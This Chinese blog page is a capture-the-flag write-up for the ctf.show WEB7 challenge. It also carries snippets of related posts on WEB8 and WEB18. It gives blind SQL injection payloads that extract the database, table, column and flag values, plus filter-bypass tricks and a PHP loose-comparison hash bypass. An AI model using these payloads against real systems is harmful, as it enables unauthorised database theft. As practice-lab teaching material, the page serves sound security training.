CTF show WEB7-8

最新推荐文章于 2025-07-27 10:35:53 发布
原创 最新推荐文章于 2025-07-27 10:35:53 发布 · 4.1k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#脚本语言 #mysql #安全

题目网站https://ctf.show

web7

点开其中一篇文章,输入id=1||1存在全部文章内容,说明为整形注入

1.爆库名(web7)
当输入为id=-1/**/or/**/ascii(substr(database(),1,1))=119时出现文章内容,证明库名的第一个字符为‘w’,以此类推。

2.爆表名(flag,page,user)

id=-1/**/or/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1),1,1))=102

3.爆字段(flag)
id=-1/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),1,1))=102

4.爆字段值
id=-1/**/or/**/ascii(substr((select/**/flag/**/from/**/flag/**/limit/**/0,1),1,1))=102

附:python脚本

import requests
url =
最低0.47元/天 解锁文章
CTFshow web7
sinat_31884905的博客
05-21 480
```php # -*- coding: utf-8 -*- """ Created on Fri May 21 11:23:55 2021 @author: Administrator """ import requests s=requests.session() url="http://7341d132-e805-412d-8c9e-3402d7c1e803.challenge.ctf.show:8080/index.php?id=-1'/**/" table="" for i in ran.
ctfshow WEB web8
weixin_68416970的博客
03-30 701
ctfshow WEB web8
CTF-show WEB入门--web7
m0_73912575的博客
12-30 825
CTF-show WEB入门--web7
ctfshow-WEB-web7
wangyuxiang946的博客
08-22 1万+
ctf.show WEB模块第7关是一个SQL注入漏洞,注入点是数值型注入,源码中过滤了空格,我们可以使用括号()或者注释/**/来代替空格 页面中有一个文章列表,随便点一个 从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞 首先判断注入点,输入以下payload,使SQL恒成立 1/**/and/**/1 可以看到,页面正常显示 在输入以下payload,使SQL恒不成立 1/**/and/**/0 可以...
ctfshow-WEB-web8
热门推荐
wangyuxiang946的博客
09-05 2万+
ctf.show WEB模块第8关是一个SQL 注入漏洞, 注入点是数值型, 注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字, 1. 过滤空格, 可以使用括号() 或者注释/**/ 绕过 2. 过滤and, 可以使用or替代 3. 过滤union, 可以用盲注替代联合注入 4. 过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用substr(database() from 1 for 1)来代替 首先确定注入点, 输入...
CTF-show WEB入门--web5
m0_73912575的博客
10-29 276
CTF-show WEB入门--web5
CTF Show-Web-web2
2301_81208321的博客
07-27 290
完整攻击链示意图:确定注入点 → 探测列数 → 定位回显 → 获取库名 → 枚举表名 → 枚举列名 → 提取数据。
ctfhub-web-信息泄露
joker_in_here的博客
08-13 1779
下载dvcs-ripper-master.zip-将压缩包拖到虚拟机kali桌面-解压-打开文件-在该文件目录下打开终端-输入命令sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl。切到dist目录-运用ls -al命令查看所有文件-找到刚才克隆的文件目录-切换到此目录-运行ls -al命令-发现一个后缀带txt的文件-用cat打开文件得到答案。
CTF-show WEB入门--web14
m0_73912575的博客
01-04 1015
CTF-show WEB入门--web14
CTF-show WEB入门--web9
m0_73912575的博客
12-31 602
CTF-show WEB入门--web9
CTF SHOW WEB8
qq_53319483的博客
04-21 2256
CTF SHOW WEB8
ctfshow web8
qq_45694932的博客
09-13 1119
整形注入 判断是字符型还是整形注入 1.检查是否存在注入 2.空格过滤用/**/替换 3. ,过滤: 将limit 0,1样式改为limit 1 offset 0。 将substr(string,1,1)改为substr(string from 1 for 1)。 id=-1 /**/or /**/1=1 返回正确 id=-1/**/or/**/1=2 错误没有回显应该是盲注 说明是整形注入 这里过滤了and import requests url='http://e2312a42-19a7-4415-
ctfshow-web8
aarong的博客
12-24 1907
如图跟上题一样都是sql注入类型的题目: 根据上题过滤空格的经验,这一题也是一样过滤了空格,并且and、和union select都过滤了,那么只能考虑运用其他方法来注入了: 过滤空格:可以使用/**/和%a0绕过 过滤联合查询语句:可以使用盲注替代联合注入 过滤逗号,:可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用 substr(database() from 1 for 1)来代替 过滤and:可以使用or 从这篇博客得到了注入代码: ...
ctfshow-WEB-web8_ctfshow web8
2501_90325913的博客
01-19 644
ctf.showWEB模块第8关是一个SQL注入漏洞,注入点是数值型,注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字,接下来进行脱库,由于盲注脱库比较复杂,此处我们构造Python脚本进行自动化脱库,注意payload中的字符串不要换行,否则可能会出问题。由于SQL恒成立,数据库将查询出表中的所有内容,并返回到前端展示。由于SQL恒不成立,数据库查询不到任何数据,从而导致页面空显示。由以上返回结果可知,该页面存在SQL注入,注入点为。
ctfshow web8 wp
Critical_plus的博客
08-20 2059
第八题看起来和第七题十分相似,但是尝试过后会发现第八题的有了一些关键词过滤,所以union拼接注入不可行,但是我们又看到了他会返回报错信息所以此时想到报错注入。 这里是我在网上抄的代码,原理就是一个一个字符去猜,直到猜出所有字符 import requests s=requests.session() url='http://124.156.121.112:28045/index.php' table="" for i in range(1,45): print(i) for j in r
ctfshow web7
博客地址 www.sec0nd.top
02-25 1145
文章目录题目分析解题过程 题目分析 打开题目后,有三个文章 随便点一个之后发现网址上有个后缀 ?id=2 应该是get传参的注入了 在后缀上加 ?id=1||1 显示全部文章,可能是整形注入,还是盲注 他这个过滤了空格,用/**/代替(详见web6 wp) 解题过程 盲注都是一个字一个字对比,很麻烦,所以这里用大佬的脚本做题 import requests s=requests.session() url='http://376f6454-37f5-47df-aa98-bfd375f0f8d9.ch
ctfshow-web7
aarong的博客
12-22 1379
如题所示: 随意点入一个文章,在URL中发现有?id=x这样参数,因此判断有SQL注入点: 跟上题一样这题也是过滤空格的 把空格改成/**/,发现没有过滤 随后就是把?id=-1,联合查询就行了 http://63d80c8a-317e-4b8f-a2a0-0af74c123b1b.challenge.ctf.show/index.php/?id=-1/**/union/**/select/**/1,database(),3 得到数据库为web7 爆表得到三张表flag、page、user 这里
CTF.showweb7-web8
qq_46230755的博客
01-15 1032
web7 这题是一题盲注题,对url进行盲注测试 从网上找到的师傅的爆表名脚本 import requests url = "http://1060cceb-f9ef-4fb3-b273-034c74a0bd38.chall.ctf.show/index.php?id=-1'/**/" def db(url): # 爆库名 for i in range(1, 5): for j in range(32, 128): u = "or/**/ascii(s
ctf-show web入门--web18
最新发布
08-06
### 解题思路与分析 CTFShow Web18 是一道典型的 PHP 字符串比较绕过题,其核心机制依赖于 PHP 中松散比较(`==`)的类型转换特性。题目通常会设置一个条件判断,例如要求用户输入的值与特定字符串相等,但通过构造特殊输入可以绕过该判断。 在 PHP 中,当使用 `==` 进行比较时,如果其中一个操作数是数字或以数字开头的字符串,则 PHP 会尝试将其转换为数字进行比较。例如,字符串 `0e123456` 会被转换为浮点数 `0`,从而在与数字 `0` 或其他以 `0e` 开头的字符串比较时被视为“相等”。 在 Web18 题目中,若服务器端判断逻辑类似 `$_GET['key'] == '0e123456'`,则可以构造 `key=0` 或 `key=0e123456789`,利用 PHP 的类型转换机制使条件成立,从而获取 flag[^1]。 ### 示例代码与利用方式 假设题目源码如下: ```php if ($_GET['key'] == '0e123456') { echo $flag; } ``` 由于 PHP 的松散比较机制,以下输入均能绕过判断: - `?key=0` - `?key=0e123456789` PHP 会将这些值转换为浮点数 `0`,从而与 `'0e123456'` 转换后的结果相等,触发 flag 输出。 ### 技术细节与扩展 - **松散比较与严格比较**:PHP 中 `==` 为松散比较,允许类型转换;而 `===` 为严格比较,要求类型与值均相同。CTF 题目中若使用 `==`,则可能被构造输入绕过。 - **MD5 哈希绕过**:在类似题目中,若输入经过 MD5 哈希后进行比较,可利用某些字符串的 MD5 值以 `0e` 开头,从而在比较中被误判为“相等”。 - **数组绕过**:部分题目允许通过传递数组参数绕过判断,例如 `?key[]=123`,但 Web18 通常不涉及此方式。 ### 实际操作步骤 1. 构造 GET 请求,输入 `?key=0e123456789`。 2. 提交后若条件成立,页面将输出 flag。 3. 若题目使用 MD5 哈希机制,可查找以 `0e` 开头的 MD5 值,构造对应输入。 ```php // 示例:MD5 哈希绕过 if(md5($_GET['pass']) == '0e215962017') { echo $flag; } ``` 可使用已知的 MD5 哈希碰撞值如 `s878926199a`,其 MD5 值为 `0e545993274517701592006694417082`,满足条件。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值